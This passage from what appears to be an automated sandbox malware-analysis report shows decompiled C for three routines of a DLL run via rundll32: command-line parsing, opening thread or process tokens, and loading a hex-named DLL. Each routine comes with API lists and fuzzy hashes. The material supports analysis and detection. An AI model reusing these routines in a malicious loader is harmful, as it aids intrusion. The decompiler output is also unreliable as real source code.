                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3510742995-0
                                                                                                                                                                          • Opcode ID: 91640b19e7d0a89fb15d7722cf56a0f0eb65f90dc13b34d669ab98b2b0f7349b
                                                                                                                                                                          • Instruction ID: 608367cce7ce40668a14c070f4f8b38a81cfced9e19564bd56cf48f5647a2197
                                                                                                                                                                          • Opcode Fuzzy Hash: 91640b19e7d0a89fb15d7722cf56a0f0eb65f90dc13b34d669ab98b2b0f7349b
                                                                                                                                                                          • Instruction Fuzzy Hash: 7ED10475600A059FCB24CF69D8C4A6AB7E5FF88344B25892DE88ACB711DB31F985CB50
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                          			E1000BA2B(intOrPtr __ecx) {
                                                                                                                                                                          				int _v8;
                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                          				short* _v140;
                                                                                                                                                                          				intOrPtr _v144;
                                                                                                                                                                          				short _v664;
                                                                                                                                                                          				signed int _t28;
                                                                                                                                                                          				signed int _t29;
                                                                                                                                                                          				signed int _t30;
                                                                                                                                                                          				int _t40;
                                                                                                                                                                          				signed int _t41;
                                                                                                                                                                          				int _t44;
                                                                                                                                                                          				signed int _t45;
                                                                                                                                                                          				WCHAR* _t52;
                                                                                                                                                                          				signed int _t54;
                                                                                                                                                                          				short* _t55;
                                                                                                                                                                          				void* _t56;
                                                                                                                                                                          
                                                                                                                                                                          				_v8 = _v8 & 0x00000000;
                                                                                                                                                                          				_v16 = __ecx;
                                                                                                                                                                          				_t54 = 0;
                                                                                                                                                                          				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
                                                                                                                                                                          				_t44 = _v8;
                                                                                                                                                                          				_t41 = 0;
                                                                                                                                                                          				_v12 = _t28;
                                                                                                                                                                          				if(_t44 <= 0) {
                                                                                                                                                                          					L22:
                                                                                                                                                                          					_t29 = _t28 | 0xffffffff;
                                                                                                                                                                          					__eflags = _t29;
                                                                                                                                                                          					return _t29;
                                                                                                                                                                          				} else {
                                                                                                                                                                          					goto L1;
                                                                                                                                                                          				}
                                                                                                                                                                          				do {
                                                                                                                                                                          					L1:
                                                                                                                                                                          					_t52 =  *(_t28 + _t41 * 4);
                                                                                                                                                                          					_t30 =  *_t52 & 0x0000ffff;
                                                                                                                                                                          					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t54 < 0x20) {
                                                                                                                                                                          						 *(_t56 + _t54 * 4 - 0x8c) = _t52;
                                                                                                                                                                          						_t40 = lstrlenW(_t52);
                                                                                                                                                                          						_t45 = 0;
                                                                                                                                                                          						if(_t40 <= 0) {
                                                                                                                                                                          							L11:
                                                                                                                                                                          							_t44 = _v8;
                                                                                                                                                                          							_t54 = _t54 + 1;
                                                                                                                                                                          							goto L12;
                                                                                                                                                                          						} else {
                                                                                                                                                                          							goto L8;
                                                                                                                                                                          						}
                                                                                                                                                                          						do {
                                                                                                                                                                          							L8:
                                                                                                                                                                          							if(_t52[_t45] == 0x2c) {
                                                                                                                                                                          								_t52[_t45] = 0;
                                                                                                                                                                          							}
                                                                                                                                                                          							_t45 = _t45 + 1;
                                                                                                                                                                          						} while (_t45 < _t40);
                                                                                                                                                                          						goto L11;
                                                                                                                                                                          					}
                                                                                                                                                                          					L12:
                                                                                                                                                                          					_t28 = _v12;
                                                                                                                                                                          					_t41 = _t41 + 1;
                                                                                                                                                                          				} while (_t41 < _t44);
                                                                                                                                                                          				if(_t54 != 1) {
                                                                                                                                                                          					if(__eflags <= 0) {
                                                                                                                                                                          						goto L22;
                                                                                                                                                                          					}
                                                                                                                                                                          					_t55 = _v140;
                                                                                                                                                                          					L17:
                                                                                                                                                                          					if( *_t55 == 0x5c ||  *((short*)(_t55 + 2)) == 0x3a) {
                                                                                                                                                                          						E1000C229(_v16, _t55, 0x104);
                                                                                                                                                                          					} else {
                                                                                                                                                                          						GetCurrentDirectoryW(0x104,  &_v664);
                                                                                                                                                                          						_push(0);
                                                                                                                                                                          						_push(_t55);
                                                                                                                                                                          						_push("\\");
                                                                                                                                                                          						_v12 = E100099EC( &_v664);
                                                                                                                                                                          						E1000C229(_v16, _t36, 0x104);
                                                                                                                                                                          						E10009203( &_v12, 0xfffffffe);
                                                                                                                                                                          					}
                                                                                                                                                                          					return 0;
                                                                                                                                                                          				}
                                                                                                                                                                          				_t55 = _v144;
                                                                                                                                                                          				goto L17;
                                                                                                                                                                          			}




















                                                                                                                                                                          0x1000ba34
                                                                                                                                                                          0x1000ba3b
                                                                                                                                                                          0x1000ba3e
                                                                                                                                                                          0x1000ba4b
                                                                                                                                                                          0x1000ba51
                                                                                                                                                                          0x1000ba54
                                                                                                                                                                          0x1000ba56
                                                                                                                                                                          0x1000ba5b
                                                                                                                                                                          0x1000bb32
                                                                                                                                                                          0x1000bb32
                                                                                                                                                                          0x1000bb32
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000ba61
                                                                                                                                                                          0x1000ba61
                                                                                                                                                                          0x1000ba61
                                                                                                                                                                          0x1000ba64
                                                                                                                                                                          0x1000ba6a
                                                                                                                                                                          0x1000ba86
                                                                                                                                                                          0x1000ba8d
                                                                                                                                                                          0x1000ba93
                                                                                                                                                                          0x1000ba97
                                                                                                                                                                          0x1000baab
                                                                                                                                                                          0x1000baab
                                                                                                                                                                          0x1000baae
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000ba99
                                                                                                                                                                          0x1000ba99
                                                                                                                                                                          0x1000ba9e
                                                                                                                                                                          0x1000baa2
                                                                                                                                                                          0x1000baa2
                                                                                                                                                                          0x1000baa6
                                                                                                                                                                          0x1000baa7
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000ba99
                                                                                                                                                                          0x1000baaf
                                                                                                                                                                          0x1000baaf
                                                                                                                                                                          0x1000bab2
                                                                                                                                                                          0x1000bab3
                                                                                                                                                                          0x1000baba
                                                                                                                                                                          0x1000bac4
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000bac6
                                                                                                                                                                          0x1000bacc
                                                                                                                                                                          0x1000bad0
                                                                                                                                                                          0x1000bb28
                                                                                                                                                                          0x1000bad9
                                                                                                                                                                          0x1000bae6
                                                                                                                                                                          0x1000baec
                                                                                                                                                                          0x1000baee
                                                                                                                                                                          0x1000baf5
                                                                                                                                                                          0x1000bb06
                                                                                                                                                                          0x1000bb09
                                                                                                                                                                          0x1000bb14
                                                                                                                                                                          0x1000bb19
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000bb2e
                                                                                                                                                                          0x1000babc
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCommandLineW.KERNEL32(00000000,00000228,00000228), ref: 1000BA40
                                                                                                                                                                          • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 1000BA4B
                                                                                                                                                                          • lstrlenW.KERNEL32(00000000), ref: 1000BA8D
                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 1000BAE6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CommandLine$ArgvCurrentDirectorylstrlen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 159791187-0
                                                                                                                                                                          • Opcode ID: 6aebfb5b06c6c39044bafa0a3afa5e56d5a16357a18df3b8b45862e1094ba118
                                                                                                                                                                          • Instruction ID: 1dfb13a73697d1065cdb57a4d8345c5b051b7baf3ee2abb54885a1e1bf2053b0
                                                                                                                                                                          • Opcode Fuzzy Hash: 6aebfb5b06c6c39044bafa0a3afa5e56d5a16357a18df3b8b45862e1094ba118
                                                                                                                                                                          • Instruction Fuzzy Hash: B431B375E00515AFEB14DF948885AADB7F8EF4A3D0F11845AD842E3198DB709E81CB62
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E1000DC3C(void* __ecx) {
                                                                                                                                                                          				void* _v8;
                                                                                                                                                                          				void* _t10;
                                                                                                                                                                          				intOrPtr _t13;
                                                                                                                                                                          
                                                                                                                                                                          				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0) {
                                                                                                                                                                          					L4:
                                                                                                                                                                          					_t10 = _v8;
                                                                                                                                                                          				} else {
                                                                                                                                                                          					if(GetLastError() != 0x3f0) {
                                                                                                                                                                          						L3:
                                                                                                                                                                          						_t10 = 0;
                                                                                                                                                                          					} else {
                                                                                                                                                                          						_t13 =  *0x10020fa0; // 0x110f8a0
                                                                                                                                                                          						if(OpenProcessToken( *((intOrPtr*)(_t13 + 0x130))(), 8,  &_v8) != 0) {
                                                                                                                                                                          							goto L4;
                                                                                                                                                                          						} else {
                                                                                                                                                                          							goto L3;
                                                                                                                                                                          						}
                                                                                                                                                                          					}
                                                                                                                                                                          				}
                                                                                                                                                                          				return _t10;
                                                                                                                                                                          			}






                                                                                                                                                                          0x1000dc5b
                                                                                                                                                                          0x1000dc8d
                                                                                                                                                                          0x1000dc8d
                                                                                                                                                                          0x1000dc5d
                                                                                                                                                                          0x1000dc68
                                                                                                                                                                          0x1000dc89
                                                                                                                                                                          0x1000dc89
                                                                                                                                                                          0x1000dc6a
                                                                                                                                                                          0x1000dc74
                                                                                                                                                                          0x1000dc87
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000dc87
                                                                                                                                                                          0x1000dc68
                                                                                                                                                                          0x1000dc92

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 1000DC4F
                                                                                                                                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,1000DD81,00000000,10000000), ref: 1000DC56
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,1000DD81,00000000,10000000), ref: 1000DC5D
                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,1000DD81,00000000,10000000), ref: 1000DC82
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: OpenThreadToken$CurrentErrorLastProcess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1515895013-0
                                                                                                                                                                          • Opcode ID: b792e2a9ee284b098ae62641809742da31258a1248d596868d4d4808ebbd8cb3
                                                                                                                                                                          • Instruction ID: 0e5175ae539005769c67e2d26daef5d126bf47866e8b33fffce6e4c685f75d4f
                                                                                                                                                                          • Opcode Fuzzy Hash: b792e2a9ee284b098ae62641809742da31258a1248d596868d4d4808ebbd8cb3
                                                                                                                                                                          • Instruction Fuzzy Hash: 34F0303164021AAFFB50EBA4CD89F5E77ECFB08380F150465F602D7491DA70E901DB60
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                          			E1000A2EA(void* __ecx, void* __edx) {
                                                                                                                                                                          				WCHAR* _v8;
                                                                                                                                                                          				char _v12;
                                                                                                                                                                          				char _v140;
                                                                                                                                                                          				WCHAR* _t12;
                                                                                                                                                                          				intOrPtr _t17;
                                                                                                                                                                          				void* _t22;
                                                                                                                                                                          				intOrPtr _t23;
                                                                                                                                                                          				intOrPtr _t29;
                                                                                                                                                                          				intOrPtr _t32;
                                                                                                                                                                          				void* _t43;
                                                                                                                                                                          				void* _t54;
                                                                                                                                                                          				WCHAR* _t55;
                                                                                                                                                                          				char* _t56;
                                                                                                                                                                          				WCHAR* _t57;
                                                                                                                                                                          				intOrPtr _t58;
                                                                                                                                                                          				char _t60;
                                                                                                                                                                          				struct HINSTANCE__* _t61;
                                                                                                                                                                          
                                                                                                                                                                          				_t43 = 0;
                                                                                                                                                                          				_t12 = E100091B2(__ecx, 0x152a);
                                                                                                                                                                          				_t58 =  *0x10020fd8; // 0x110fc50
                                                                                                                                                                          				_t55 = _t12;
                                                                                                                                                                          				_t59 = _t58 + 0xb0;
                                                                                                                                                                          				_v8 = _t55;
                                                                                                                                                                          				E1000C172( &_v140, 0x40, L"%08x", E1000E6E9(_t59, E1000CF09(_t58 + 0xb0), 0));
                                                                                                                                                                          				_t17 =  *0x10020fd8; // 0x110fc50
                                                                                                                                                                          				_t3 = _t17 + 0xa8; // 0x1
                                                                                                                                                                          				asm("sbb eax, eax");
                                                                                                                                                                          				_t22 = E100091B2(_t59, ( ~( *_t3) & 0x000010d8) + 0x2f7);
                                                                                                                                                                          				_t56 = "\\";
                                                                                                                                                                          				_t23 =  *0x10020fd8; // 0x110fc50
                                                                                                                                                                          				_t60 = E100099EC(_t23 + 0x1020);
                                                                                                                                                                          				_v12 = _t60;
                                                                                                                                                                          				E10009E2E( &_v8);
                                                                                                                                                                          				_t29 =  *0x10020fd8; // 0x110fc50
                                                                                                                                                                          				_t57 = E100099EC(_t29 + 0x122a);
                                                                                                                                                                          				_t32 =  *0x10020fa0; // 0x110f8a0
                                                                                                                                                                          				_v8 = _t57;
                                                                                                                                                                          				 *((intOrPtr*)(_t32 + 0x120))(_t60, _t57, 0, _t56,  &_v140, ".", L"dll", 0, _t56, _t22, _t56, _t55, 0);
                                                                                                                                                                          				_t61 = LoadLibraryW(_t57);
                                                                                                                                                                          				if(_t61 != 0) {
                                                                                                                                                                          					_push(_t61);
                                                                                                                                                                          					_t54 = 0x40;
                                                                                                                                                                          					_t43 = E1000950E(0x1001d9c0, _t54);
                                                                                                                                                                          				}
                                                                                                                                                                          				E10009203( &_v12, 0xfffffffe);
                                                                                                                                                                          				E1000936A( &_v140, 0, 0x80);
                                                                                                                                                                          				if(_t43 != 0) {
                                                                                                                                                                          					 *0x100210b0 = _t61;
                                                                                                                                                                          					 *0x100210b8 = _t57;
                                                                                                                                                                          				} else {
                                                                                                                                                                          					E10009203( &_v8, 0xfffffffe);
                                                                                                                                                                          				}
                                                                                                                                                                          				return _t43;
                                                                                                                                                                          			}




















                                                                                                                                                                          0x1000a2fb
                                                                                                                                                                          0x1000a2fd
                                                                                                                                                                          0x1000a302
                                                                                                                                                                          0x1000a308
                                                                                                                                                                          0x1000a30b
                                                                                                                                                                          0x1000a311
                                                                                                                                                                          0x1000a334
                                                                                                                                                                          0x1000a339
                                                                                                                                                                          0x1000a33e
                                                                                                                                                                          0x1000a346
                                                                                                                                                                          0x1000a353
                                                                                                                                                                          0x1000a35a
                                                                                                                                                                          0x1000a361
                                                                                                                                                                          0x1000a372
                                                                                                                                                                          0x1000a378
                                                                                                                                                                          0x1000a37b
                                                                                                                                                                          0x1000a392
                                                                                                                                                                          0x1000a3a6
                                                                                                                                                                          0x1000a3a8
                                                                                                                                                                          0x1000a3ad
                                                                                                                                                                          0x1000a3b3
                                                                                                                                                                          0x1000a3c0
                                                                                                                                                                          0x1000a3c4
                                                                                                                                                                          0x1000a3c6
                                                                                                                                                                          0x1000a3c9
                                                                                                                                                                          0x1000a3d5
                                                                                                                                                                          0x1000a3d5
                                                                                                                                                                          0x1000a3dd
                                                                                                                                                                          0x1000a3f0
                                                                                                                                                                          0x1000a3fa
                                                                                                                                                                          0x1000a40b
                                                                                                                                                                          0x1000a411
                                                                                                                                                                          0x1000a3fc
                                                                                                                                                                          0x1000a402
                                                                                                                                                                          0x1000a408
                                                                                                                                                                          0x1000a41d

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 1000C172: _vsnwprintf.MSVCRT ref: 1000C18F
                                                                                                                                                                            • Part of subcall function 100099EC: lstrcatW.KERNEL32(00000000,?), ref: 10009A2B
                                                                                                                                                                          • LoadLibraryW.KERNEL32(00000000), ref: 1000A3BA
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LibraryLoad_vsnwprintflstrcat
                                                                                                                                                                          • String ID: %08x$dll
                                                                                                                                                                          • API String ID: 1445519121-2963171978
                                                                                                                                                                          • Opcode ID: ee69ddeb78258e57ff159ad9a30d3da6fa3b71f745943adbbaa0d20dd1f6eede
                                                                                                                                                                          • Instruction ID: da7a666e81fd9e8665abe568421c0efaf6e603c8ab56a2e2e86a9924a4d9d885
                                                                                                                                                                          • Opcode Fuzzy Hash: ee69ddeb78258e57ff159ad9a30d3da6fa3b71f745943adbbaa0d20dd1f6eede
                                                                                                                                                                          • Instruction Fuzzy Hash: 77310776A042147BF750E7649C86FDB36ADEB85790F200175F204E7286DE74DE8587A0
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%